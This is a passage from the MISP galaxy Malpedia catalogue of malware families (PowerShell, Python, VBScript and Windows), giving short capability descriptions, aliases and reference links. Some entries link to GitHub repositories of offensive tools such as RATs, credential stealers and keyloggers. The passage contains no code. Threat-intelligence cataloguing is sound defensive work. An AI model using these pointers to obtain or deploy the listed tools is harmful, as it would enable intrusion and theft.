https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf

POWERSTATS

POWERSTATS is a backdoor written in powershell. It has the ability to disable Microsoft Office Protected View, fingerprint the victim and receive commands.

The tag is: misp-galaxy:malpedia="POWERSTATS"

POWERSTATS is also known as:

Valyria

Table 1286. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerstats
https://blog.prevailion.com/2020/01/summer-mirage.html
https://shells.systems/reviving-leaked-muddyc3-used-by-muddywater-apt/
https://marcoramilli.com/2020/01/15/iranian-threat-actors-preliminary-analysis/
http://www.secureworks.com/research/threat-profiles/cobalt-ulster
https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/
https://www.clearskysec.com/muddywater-operations-in-lebanon-and-oman/
https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/
https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/
https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/
https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/
https://securelist.com/apt-trends-report-q2-2019/91897/
https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html
https://www.secureworks.com/research/threat-profiles/cobalt-ulster
https://www.clearskysec.com/muddywater-targets-kurdish-groups-turkish-orgs/

POWERTON

The tag is: misp-galaxy:malpedia="POWERTON"

POWERTON is also known as:

Table 1287. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerton
https://www.secureworks.com/research/threat-profiles/cobalt-trinity
https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html
https://www.symantec.com/security-center/writeup/2019-062513-4935-99
https://norfolkinfosec.com/apt33-powershell-malware/
https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/
https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/
https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html

PowerWare

The tag is: misp-galaxy:malpedia="PowerWare"

PowerWare is also known as:

Table 1288. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerware
https://blog.cylance.com/ransomware-update-todays-bountiful-cornucopia-of-extortive-threats

PowerZure

PowerZure is a PowerShell project created to assess and exploit resources within Microsoft’s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.

The tag is: misp-galaxy:malpedia="PowerZure"

PowerZure is also known as:

Table 1289. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerzure
https://github.com/hausec/PowerZure

PowGoop

DLL loader that decrypts and runs a powershell-based downloader.

The tag is: misp-galaxy:malpedia="PowGoop"

PowGoop is also known as:

Table 1290. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powgoop
https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east
https://unit42.paloaltonetworks.com/thanos-ransomware/
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://www.cyberscoop.com/muddywater-iran-symantec-middle-east/

POWRUNER

The tag is: misp-galaxy:malpedia="POWRUNER"

POWRUNER is also known as:

Table 1291. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powruner
https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae
https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2

PresFox

The family is adding a fake root certificate authority, sets a proxy.pac-url for local browsers and redirects infected users to fake banking applications (currently targeting Poland). Based on information shared, it seems the PowerShell script is dropped by an exploit kit.

The tag is: misp-galaxy:malpedia="PresFox"

PresFox is also known as:

Table 1292. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.presfox
https://twitter.com/kafeine/status/1092000556598677504

QUADAGENT

The tag is: misp-galaxy:malpedia="QUADAGENT"

QUADAGENT is also known as:

Table 1293. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent
https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae
https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca
https://youtu.be/pBDu8EGWRC4?t=2492
https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/
https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html

RogueRobin

The tag is: misp-galaxy:malpedia="RogueRobin"

RogueRobin is also known as:

Table 1294. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.roguerobin
https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca
https://ironnet.com/blog/dns-tunneling-series-part-3-the-siren-song-of-roguerobin/
https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/

Schtasks

The tag is: misp-galaxy:malpedia="Schtasks"

Schtasks is also known as:

Table 1295. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.schtasks
https://github.com/re4lity/Schtasks-Backdoor/blob/master/Schtasks-Backdoor.ps1

skyrat

The tag is: misp-galaxy:malpedia="skyrat"

skyrat is also known as:

Table 1296. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.skyrat
https://github.com/YSCHGroup/SkyRAT

sLoad

sLoad is a PowerShell downloader that most frequently delivers Ramnit banker and includes noteworthy reconnaissance features. The malware gathers information about the infected system including a list of running processes, the presence of Outlook, and the presence of Citrix-related files. sLoad can also take screenshots and check the DNS cache for specific domains (e.g., targeted banks), as well as load external binaries.

The tag is: misp-galaxy:malpedia="sLoad"

sLoad is also known as:

Starslord

Table 1297. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.sload
https://cyware.com/news/new-sload-malware-downloader-being-leveraged-by-apt-group-ta554-to-spread-ramnit-7d03f2d9
https://www.certego.net/en/news/sload-hits-italy-unveil-the-power-of-powershell-as-a-downloader/
https://blog.minerva-labs.com/sload-targeting-europe-again
https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/
https://www.cert-pa.it/notizie/campagna-sload-star-wars-edition-veicolata-via-pec/
https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf
https://blog.yoroi.company/research/the-sload-powershell-threat-is-expanding-to-italy/
https://threatpost.com/sload-spying-payload-delivery-bits/151120/
https://cert-agid.gov.it/news/campagna-sload-v-2-9-3-veicolata-via-pec/
https://www.cybereason.com/blog/banking-trojan-delivered-by-lolbins-ramnit-trojan
https://www.microsoft.com/security/blog/2020/01/21/sload-launches-version-2-0-starslord/
https://www.vkremez.com/2018/08/lets-learn-in-depth-into-latest-ramnit.html
https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy

Snugy

The tag is: misp-galaxy:malpedia="Snugy"

Snugy is also known as:

Table 1298. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.snugy
https://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/

Swrort Stager

The tag is: misp-galaxy:malpedia="Swrort Stager"

Swrort Stager is also known as:

Table 1299. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.swrort
https://github.com/itsKindred/malware-analysis-writeups/blob/master/swrort-dropper/swrort-stager-analysis.pdf

Tater PrivEsc

The tag is: misp-galaxy:malpedia="Tater PrivEsc"

Tater PrivEsc is also known as:

Table 1300. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.tater
https://github.com/Kevin-Robertson/Tater

ThunderShell

The tag is: misp-galaxy:malpedia="ThunderShell"

ThunderShell is also known as:

Table 1301. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.thundershell
https://github.com/Mr-Un1k0d3r/ThunderShell

Unidentified PS 001

Recon and exfiltration script, dropped from a LNK file. Attributed to APT-C-12.

The tag is: misp-galaxy:malpedia="Unidentified PS 001"

Unidentified PS 001 is also known as:

Table 1302. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.unidentified_001
https://bitofhex.com/2020/02/10/sapphire-mushroom-lnk-files/

WannaMine

The tag is: misp-galaxy:malpedia="WannaMine"

WannaMine is also known as:

Table 1303. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wannamine
https://news.sophos.com/fr-fr/2020/01/22/wannamine-meme-cybercriminels-veulent-avoir-mot-a-dire-sur-brexit/
https://www.cybereason.com/blog/wannamine-cryptominer-eternalblue-wannacry
https://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/
https://nakedsecurity.sophos.com/2018/01/31/what-are-wannamine-attacks-and-how-do-i-avoid-them/
https://www.accenture.com/_acnmedia/PDF-46/Accenture-Threat-Analysis-Monero-Wannamine.pdf
https://www.crowdstrike.com/blog/weeding-out-wannamine-v4-0-analyzing-and-remediating-this-mineware-nightmare/

WannaRen Downloader

The tag is: misp-galaxy:malpedia="WannaRen Downloader"

WannaRen Downloader is also known as:

Table 1304. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wannaren_loader
https://twitter.com/blackorbird/status/1247834024711577601

WMImplant

The tag is: misp-galaxy:malpedia="WMImplant"

WMImplant is also known as:

Table 1305. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wmimplant
https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html

Archivist

The tag is: misp-galaxy:malpedia="Archivist"

Archivist is also known as:

Table 1306. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/py.archivist
https://github.com/NullArray/Archivist

Ares

Ares is a Python RAT.

The tag is: misp-galaxy:malpedia="Ares"

Ares is also known as:

Table 1307. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/py.ares
https://github.com/sweetsoftware/Ares

BrickerBot

The tag is: misp-galaxy:malpedia="BrickerBot"

BrickerBot is also known as:

Table 1308. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/py.brickerbot
https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/
https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/
https://www.trustwave.com/Resources/SpiderLabs-Blog/BrickerBot-mod_plaintext-Analysis/
https://www.bleepingcomputer.com/news/security/brickerbot-author-retires-claiming-to-have-bricked-over-10-million-iot-devices/
http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f
https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-102-01A
http://seclists.org/fulldisclosure/2017/Mar/7

DropboxC2C

The tag is: misp-galaxy:malpedia="DropboxC2C"

DropboxC2C is also known as:

Table 1309. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/py.dropboxc2c
https://github.com/0x09AL/DropboxC2C

KeyPlexer

The tag is: misp-galaxy:malpedia="KeyPlexer"

KeyPlexer is also known as:

Table 1310. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/py.keyplexer
https://github.com/nairuzabulhul/KeyPlexer

LaZagne

The author described LaZagne as an open source project used to retrieve lots of passwords stored on a local computer. It has been developed for the purpose of finding these passwords for the most commonly-used software. It is written in Python and provided as compiled standalone binaries for Linux, Mac, and Windows.

The tag is: misp-galaxy:malpedia="LaZagne"

LaZagne is also known as:

Table 1311. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/py.lazagne
https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/
https://github.com/AlessandroZ/LaZagne
https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/
https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html
https://edu.anarcho-copy.org/Against%20Security%20&%20%20Self%20Security/Group-IB%20RedCurl.pdf

N3Cr0m0rPh

An IRC bot written in (obfuscated) Python code. Distributed in attack campaign FreakOut, written by author Freak/Fl0urite and development potentially dating back as far as 2015.

The tag is: misp-galaxy:malpedia="N3Cr0m0rPh"

N3Cr0m0rPh is also known as:

FreakOut
Necro

Table 1312. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/py.n3cr0m0rph
https://blog.talosintelligence.com/2021/06/necro-python-bot-adds-new-tricks.html
https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/
https://blog.netlab.360.com/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/
https://twitter.com/xuy1202/status/1393384128456794116
https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/
https://www.lacework.com/the-kek-security-network/
https://github.com/lacework/lacework-labs/tree/master/keksec
https://www.lacework.com/keksec-tsunami-ryuk/
https://twitter.com/xuy1202/status/1392089568384454657
https://www.bleepingcomputer.com/news/security/freakout-malware-worms-its-way-into-vulnerable-vmware-servers/
https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/

NetWorm

The tag is: misp-galaxy:malpedia="NetWorm"

NetWorm is also known as:

Table 1313. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/py.networm
https://github.com/pylyf/NetWorm

PIRAT

The tag is: misp-galaxy:malpedia="PIRAT"

PIRAT is also known as:

Table 1314. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/py.pirat
https://vk.com/m228228?w=wall306895781_177

Poet RAT

Cisco Talos has discovered a Python-based RAT they call Poet RAT. It is dropped from a Word document and delivered including a Python interpreter and required libraries. The name originates from references to Shakespeare. Exfiltration happens through FTP.

The tag is: misp-galaxy:malpedia="Poet RAT"

Poet RAT is also known as:

Table 1315. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/py.poet_rat
https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html
https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-stibnite/
https://securelist.com/apt-trends-report-q3-2020/99204/
https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf
https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/
https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/
https://blog.talosintelligence.com/2020/10/poetrat-update.html
https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

pupy (Python)

The tag is: misp-galaxy:malpedia="pupy (Python)"

pupy (Python) is also known as:

Table 1316. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/py.pupy
https://www.secureworks.com/research/threat-profiles/cobalt-gypsy
https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf
https://www.secureworks.com/research/threat-profiles/cobalt-trinity
https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf
https://github.com/n1nj4sec/pupy

PyArk

The tag is: misp-galaxy:malpedia="PyArk"

PyArk is also known as:

Table 1317. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/py.pyark
https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/

PyVil

PyVil RAT

The tag is: misp-galaxy:malpedia="PyVil"

PyVil is also known as:

Table 1318. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/py.pyvil
https://www.cybereason.com/blog/no-rest-for-the-wicked-evilnum-unleashes-pyvil-rat
https://twitter.com/ESETresearch/status/1360178593968623617

Responder

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

The tag is: misp-galaxy:malpedia="Responder"

Responder is also known as:

SpiderLabs Responder

Table 1319. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/py.responder
https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/
https://github.com/lgandx/Responder

Saphyra

The tag is: misp-galaxy:malpedia="Saphyra"

Saphyra is also known as:

Table 1320. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/py.saphyra
https://securityintelligence.com/dissecting-hacktivists-ddos-tool-saphyra-revealed/
https://www.youtube.com/watch?v=Bk-utzAlYFI

SpaceCow

The tag is: misp-galaxy:malpedia="SpaceCow"

SpaceCow is also known as:

Table 1321. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/py.spacecow
https://github.com/TheSph1nx/SpaceCow

stealler

The tag is: misp-galaxy:malpedia="stealler"

stealler is also known as:

Table 1322. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/py.stealler
https://habr.com/en/sandbox/135410/

Stitch

The tag is: misp-galaxy:malpedia="Stitch"

Stitch is also known as:

Table 1323. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/py.stitch
https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/
https://github.com/nathanlopez/Stitch

unidentified_001

The tag is: misp-galaxy:malpedia="unidentified_001"

unidentified_001 is also known as:

Table 1324. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_001

unidentified_002

The tag is: misp-galaxy:malpedia="unidentified_002"

unidentified_002 is also known as:

Table 1325. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_002

unidentified_003

The tag is: misp-galaxy:malpedia="unidentified_003"

unidentified_003 is also known as:

Table 1326. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_003

Venomous

Ransomware written in Python and delivered as compiled executable created using PyInstaller.

The tag is: misp-galaxy:malpedia="Venomous"

Venomous is also known as:

Table 1327. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/py.venomous
https://blog.cyble.com/2021/08/04/a-deep-dive-analysis-of-venomous-ransomware/

FlexiSpy (symbian)

The tag is: misp-galaxy:malpedia="FlexiSpy (symbian)"

FlexiSpy (symbian) is also known as:

Table 1328. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/symbian.flexispy
https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/

CageyChameleon

CageyChameleon Malware is a VBS-based backdoor which has the capability to enumerate the list of running processes and check for the presence of several antivirus products. CageyChameleon will collect user host information, system current process information, etc. The collected information is sent back to the C2 server, and continue to initiate requests to perform subsequent operations.

The tag is: misp-galaxy:malpedia="CageyChameleon"

CageyChameleon is also known as:

Table 1329. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/vbs.cageychameleon
https://atlas-cybersecurity.com/cyber-threats/cryptocore-cryptocurrency-exchanges-under-attack/
https://www.proofpoint.com/us/daily-ruleset-update-summary-20190314
https://cyberstruggle.org/delta/LeeryTurtleThreatReport_05_20.pdf
https://www.clearskysec.com/wp-content/uploads/2020/06/CryptoCore_Group.pdf
https://vb2020.vblocalhost.com/conference/presentations/unveiling-the-cryptomimic/
https://www.clearskysec.com/cryptocore-group/
https://www.clearskysec.com/wp-content/uploads/2021/05/CryptoCore-Lazarus-Clearsky.pdf

forbiks

The tag is: misp-galaxy:malpedia="forbiks"

forbiks is also known as:

Forbix

Table 1330. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/vbs.forbiks
https://persianov.net/windows-worms-forbix-worm-analysis
https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2017-090807-0934-99

GGLdr

The tag is: misp-galaxy:malpedia="GGLdr"

GGLdr is also known as:

Table 1331. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/vbs.ggldr
https://www.forcepoint.com/blog/x-labs/carbanak-group-uses-google-malware-command-and-control

Grinju Downloader

The tag is: misp-galaxy:malpedia="Grinju Downloader"

Grinju Downloader is also known as:

Table 1332. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/vbs.grinju
https://medium.com/@vishal_thakur/grinju-malware-anti-analysis-on-steroids-part-1-535e72e650b8
https://medium.com/@vishal_thakur/grinju-downloader-anti-analysis-on-steroids-part-2-8d76f427c0ce

HALFBAKED

The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information. HALFBAKED listens for the following commands from the C2 server:

info: Sends victim machine information (OS, Processor, BIOS and running processes) using WMI
        queries
processList: Send list of process running
screenshot: Takes screen shot of victim machine (using 58d2a83f777688.78384945.ps1)
runvbs: Executes a VB script
runexe: Executes EXE file
runps1: Executes PowerShell script
delete: Delete the specified file
update: Update the specified file

The tag is: misp-galaxy:malpedia="HALFBAKED"

HALFBAKED is also known as:

Table 1333. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/vbs.halfbaked
https://attack.mitre.org/software/S0151/
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf
https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html

Iloveyou

The tag is: misp-galaxy:malpedia="Iloveyou"

Iloveyou is also known as:

Love Bug
LoveLetter

Table 1334. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/vbs.iloveyou
https://resources.sei.cmu.edu/library/asset-view.cfm?assetID=496186

lampion

Malware is delivered by emails, containing links to ZIP files or ZIP attachments. The ZIP contains a VBscript that, when executed, downloads additional files from AWS S3, Google Drive or other cloud hosting services. The downloaded files are encrypted .exe and .dll files. The malware targets banking clients in Portugal.

The tag is: misp-galaxy:malpedia="lampion"

lampion is also known as:

Table 1335. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/vbs.lampion
https://seguranca-informatica.pt/new-release-of-lampion-trojan-spreads-in-portugal-with-some-improvements-on-the-vbs-downloader
https://seguranca-informatica.pt/trojan-lampion-is-back-after-3-months/
https://research.checkpoint.com/wp-content/uploads/2019/12/Threat_Intelligence_News_2019-12-30.pdf
https://seguranca-informatica.pt/targeting-portugal-a-new-trojan-lampion-has-spread-using-template-emails-from-the-portuguese-government-finance-tax/
https://unit42.paloaltonetworks.com/single-bit-trap-flag-intel-cpu/
https://seguranca-informatica.pt/lampion-trojan-disseminated-in-portugal-using-covid-19-template/

lockscreen

The tag is: misp-galaxy:malpedia="lockscreen"

lockscreen is also known as:

Table 1336. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/vbs.lockscreen
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/lockscreen-ransomware-phishing-leads-to-google-play-card-scam/

MOUSEISLAND

MOUSEISLAND is a Microsoft Word macro downloader used as the first infection stage and is delivered inside a password-protected zip attached to a phishing email. Based on Fireeye intrusion data from responding to ICEDID related incidents, the secondary payload delivered by MOUSEISLAND has been PHOTOLOADER, which acts as an intermediary downloader to install ICEDID.

The tag is: misp-galaxy:malpedia="MOUSEISLAND"

MOUSEISLAND is also known as:

Table 1337. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/vbs.mouseisland
https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html

NodeJS Ransomware

Downloads NodeJS when deployed.

The tag is: misp-galaxy:malpedia="NodeJS Ransomware"

NodeJS Ransomware is also known as:

Table 1338. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/vbs.nodejs_ransom
https://dissectingmalwa.re/the-opposite-of-fileless-malware-nodejs-ransomware.html

Starfighter (VBScript)

According to the author, this is a JavaScript based Empire launcher that runs with its own embedded powershell host to not be dependent on local powershell availability.

The tag is: misp-galaxy:malpedia="Starfighter (VBScript)"

Starfighter (VBScript) is also known as:

Table 1339. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/vbs.starfighter
https://github.com/Cn33liz/StarFighters

Unidentified VBS 001

The tag is: misp-galaxy:malpedia="Unidentified VBS 001"

Unidentified VBS 001 is also known as:

Table 1340. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_001
https://twitter.com/JohnLaTwC/status/1118278148993339392

Unidentified 002 (Operation Kremlin)

Unnamed malware. Delivered as remote template that drops a VBS file, which uses LOLBINs to crawl the disk and exfiltrate data zipped up via winrar.

The tag is: misp-galaxy:malpedia="Unidentified 002 (Operation Kremlin)"

Unidentified 002 (Operation Kremlin) is also known as:

Table 1341. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_002
https://www.clearskysec.com/operation-kremlin/

Unidentified 003 (Gamaredon Downloader)

The tag is: misp-galaxy:malpedia="Unidentified 003 (Gamaredon Downloader)"

Unidentified 003 (Gamaredon Downloader) is also known as:

Table 1342. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_003
https://aaqeel01.wordpress.com/2021/01/18/docx-files-template-injection/

WhiteShadow

The tag is: misp-galaxy:malpedia="WhiteShadow"

WhiteShadow is also known as:

Table 1343. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/vbs.whiteshadow
https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware

404 Keylogger

Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim’s sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.

The tag is: misp-galaxy:malpedia="404 Keylogger"

404 Keylogger is also known as:

404KeyLogger
Snake Keylogger

Table 1344. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
https://twitter.com/James_inthe_box/status/1401921257109561353
https://securityintelligence.com/posts/roboski-global-recovery-automation/
https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence—102
https://www.ciphertechsolutions.com/roboski-global-recovery-automation/
https://threatresearch.ext.hp.com/the-many-skins-of-snake-keylogger/
https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence—89
https://habr.com/ru/company/group-ib/blog/477198/

4h_rat

The tag is: misp-galaxy:malpedia="4h_rat"

4h_rat is also known as:

Table 1345. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.4h_rat
https://github.com/securitykitten/malware_references/blob/master/crowdstrike-intelligence-report-putter-panda.original.pdf

7ev3n

The NJCCIC describes 7ev3n as a ransomware "that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n."

The tag is: misp-galaxy:malpedia="7ev3n"

7ev3n is also known as:

Table 1346. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.7ev3n
https://blog.malwarebytes.com/threat-analysis/2016/05/7ev3n-ransomware/
https://www.cyber.nj.gov/threat-profiles/ransomware-variants/7ev3n

8.t Dropper

8T_Dropper has been used by Chinese threat actor TA428 in order to install Cotx RAT onto victim’s machines during Operation LagTime IT. According to Proofpoint the attack was developed against a number of government agencies in East Asia overseeing government information technology, domestic affairs, foreign affairs, economic development, and political processes. The dropper was delivered through an RTF document exploiting CVE-2018-0798.

The tag is: misp-galaxy:malpedia="8.t Dropper"

8.t Dropper is also known as:

8t_dropper
RoyalRoad

Table 1347. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper
https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/
https://medium.com/@Sebdraven/malicious-document-targets-vietnamese-officials-acb3b9d8b80a?
https://tradahacking.vn/another-malicious-document-with-cve-2017-11882-839e9c0bbf2f
https://nao-sec.org/2021/01/royal-road-redive.html
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf
https://blog.malwarelab.pl/posts/on_the_royal_road/
https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://community.riskiq.com/article/56fa1b2f
https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746
https://securelist.com/cycldek-bridging-the-air-gap/97157/
https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-attribution-object-using-rtf-object-dimensions-track-apt-phishing-weaponizers/
https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology
https://tradahacking.vn/l%C3%A0-1937cn-hay-oceanlotus-hay-lazarus-6ca15fe1b241
https://community.riskiq.com/article/5fe2da7f

9002 RAT

9002 RAT is a Remote Access Tool typically observed to be used by an APT to control a victim’s machine. It has been spread over via zero day exploits (e.g. targeting Internet Explorer) as well as via email attachments. The infection chain starts by opening a .LNK (an OLE packager shell object) that executes a Powershell command.

The tag is: misp-galaxy:malpedia="9002 RAT"

9002 RAT is also known as:

